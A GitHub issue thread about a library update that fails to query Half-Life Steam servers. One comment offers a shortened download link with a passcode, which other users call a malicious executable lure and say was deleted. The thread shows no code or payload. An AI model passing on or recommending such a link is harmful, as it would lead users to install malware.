### ISSUE TITLE
[V7.0.0 Latest] Cant query half life steam protocol, shows server offline

### ISSUE THREAD

**Issue by thepenguinguy2** [tltneon/lgsl#221]
hi,

edit : rollbacked to 6

**Comment by z3t444** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by Rosenstein** [comment]
I hope you did not download and run the exe that other guy  suggested
![Screenshot_2024-09-05-16-26-09-394_com.android.chrome.jpg](https://github.com/user-attachments/assets/d7a7eb7b-d3b4-47ba-8f67-b2758f967018)

**Comment by thepenguinguy2** [comment]
> I hope you did not download and run the exe that other guy suggested ![Screenshot_2024-09-05-16-26-09-394_com.android.chrome.jpg](https://private-user-images.githubusercontent.com/4959837/364819441-d7a7eb7b-d3b4-47ba-8f67-b2758f967018.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjU1NDcwNDcsIm5iZiI6MTcyNTU0Njc0NywicGF0aCI6Ii80OTU5ODM3LzM2NDgxOTQ0MS1kN2E3ZWI3Yi1kM2I0LTQ3YmEtOGY2Ny1iMjc1OGY5NjcwMTguanBnP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDkwNSUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDA5MDVUMTQzMjI3WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9MTNjMTc5MDQxZGIxZDZmNWNjYjU2ZGE5ODliOTVhYmUxNTQ0ZWVhODU4MzFkYjIxODdkZTEzMWQ1NDg3OTZkNyZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.Y6I1Rr_dopNstI2Mu8OUizzWbp7skjvBduf8DAHkEfA)

Nah all good, good his reply is deleted so other one wont get harm

**Comment by UG-Asger** [comment]
I saw the update on my phone and checked here. Got confused, but good it's deleted :) Sad how people try to ruin everything
